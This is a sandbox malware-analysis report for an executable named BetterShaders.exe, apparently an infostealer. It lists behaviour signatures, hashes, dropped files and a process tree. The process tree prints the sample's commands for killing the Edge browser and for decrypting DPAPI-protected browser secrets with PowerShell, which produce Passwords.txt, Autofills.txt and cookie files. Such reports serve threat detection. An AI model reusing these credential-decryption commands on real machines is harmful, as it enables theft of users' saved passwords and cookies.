Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/05/2024, 14:34

General

  • Target

    BetterShaders.exe

  • Size

    168.8MB

  • MD5

    26e51744ce941b55c7653e9ab229a18f

  • SHA1

    bd08f0f5b3f64aba844128dfb2d77312bbef8b46

  • SHA256

    3bcf3c61e80cc6346a8af84c89ca2c50a9eef2b6b915c6c73fff8725f1c6b118

  • SHA512

    a308443b59a0a5713b99474e30f93a7f8cc98120c11c2f9f5884d5aa61bbf0073a6cfb1c67d676d64656988802fbf1bb8a1f5234df09b1fd2c36f5f7d3fed0a4

  • SSDEEP

    1572864:du3SXrDDmfijsEGl0y+Mgp4cLTRN/33i/oHHl9sqPwqZdsJ2DWw3h9JByba/:/XX++LYYyba

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
    "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2832
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\taskkill.exe
        taskkill /IM msedge.exe /F
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2844
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3472
    • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
      "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:2
      2⤵
        PID:1288
      • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
        "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
        2⤵
          PID:4512
        • C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
          "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2592
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:3624
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:3656
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:4660
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt
          1⤵
          • Opens file in notepad (likely ransom note)
          PID:3792
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"
          1⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:3788

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f48896adf9a23882050cdff97f610a7f

          SHA1

          4c5a610df62834d43f470cae7e851946530e3086

          SHA256

          3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

          SHA512

          16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          68d80cc2ac40ea9e5c7297fba6623c45

          SHA1

          05908daef7414f753fa6006082c42485002a7da8

          SHA256

          3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96

          SHA512

          2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6

        • C:\Users\Admin\AppData\Local\Temp\57c9bfb3-4a0d-4cb3-a484-dd0ed82883c5.tmp.node

          Filesize

          1.8MB

          MD5

          3072b68e3c226aff39e6782d025f25a8

          SHA1

          cf559196d74fa490ac8ce192db222c9f5c5a006a

          SHA256

          7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01

          SHA512

          61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

        • C:\Users\Admin\AppData\Local\Temp\Autofills.txt

          Filesize

          90B

          MD5

          8fb196cd3b31b00bb8e35df5c490ade1

          SHA1

          cf7acf3dde5ba8f808be6025cf28dfe573120307

          SHA256

          969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8

          SHA512

          1c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581

        • C:\Users\Admin\AppData\Local\Temp\Passwords.txt

          Filesize

          71B

          MD5

          4d6eadc6c0ff2a52aae242512cface64

          SHA1

          58585d6d017a8c2a597d7b88e98825c59f3368c5

          SHA256

          d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09

          SHA512

          63fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfafqys2.vmm.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1592-14-0x000002D4EB740000-0x000002D4EB762000-memory.dmp

          Filesize

          136KB

        • memory/1592-17-0x000002D4EBB40000-0x000002D4EBB90000-memory.dmp

          Filesize

          320KB

        • memory/2592-92-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-94-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-95-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-96-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-97-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-93-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-91-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-85-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-86-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/2592-87-0x00000246B6270000-0x00000246B6271000-memory.dmp

          Filesize

          4KB

        • memory/3788-79-0x00007FF951E00000-0x00007FF951E18000-memory.dmp

          Filesize

          96KB

        • memory/3788-68-0x00007FF95FE90000-0x00007FF95FEA8000-memory.dmp

          Filesize

          96KB

        • memory/3788-73-0x00007FF95B8B0000-0x00007FF95B8CD000-memory.dmp

          Filesize

          116KB

        • memory/3788-71-0x00007FF95B9E0000-0x00007FF95B9F7000-memory.dmp

          Filesize

          92KB

        • memory/3788-74-0x00007FF95B860000-0x00007FF95B871000-memory.dmp

          Filesize

          68KB

        • memory/3788-72-0x00007FF95B9A0000-0x00007FF95B9B1000-memory.dmp

          Filesize

          68KB

        • memory/3788-70-0x00007FF95C310000-0x00007FF95C321000-memory.dmp

          Filesize

          68KB

        • memory/3788-69-0x00007FF95F410000-0x00007FF95F427000-memory.dmp

          Filesize

          92KB

        • memory/3788-67-0x00007FF94B8B0000-0x00007FF94BB66000-memory.dmp

          Filesize

          2.7MB

        • memory/3788-78-0x00007FF95B610000-0x00007FF95B631000-memory.dmp

          Filesize

          132KB

        • memory/3788-80-0x00007FF951DD0000-0x00007FF951DE1000-memory.dmp

          Filesize

          68KB

        • memory/3788-81-0x00007FF94BD40000-0x00007FF94BD51000-memory.dmp

          Filesize

          68KB

        • memory/3788-82-0x00007FF94BD20000-0x00007FF94BD31000-memory.dmp

          Filesize

          68KB

        • memory/3788-83-0x00007FF947000000-0x00007FF947035000-memory.dmp

          Filesize

          212KB

        • memory/3788-84-0x000002509B900000-0x000002509BA13000-memory.dmp

          Filesize

          1.1MB

        • memory/3788-77-0x00007FF9478D0000-0x00007FF948980000-memory.dmp

          Filesize

          16.7MB

        • memory/3788-76-0x00007FF95B700000-0x00007FF95B741000-memory.dmp

          Filesize

          260KB

        • memory/3788-75-0x00007FF94B6A0000-0x00007FF94B8AB000-memory.dmp

          Filesize

          2.0MB

        • memory/3788-66-0x00007FF95B8D0000-0x00007FF95B904000-memory.dmp

          Filesize

          208KB

        • memory/3788-65-0x00007FF7020B0000-0x00007FF7021A8000-memory.dmp

          Filesize

          992KB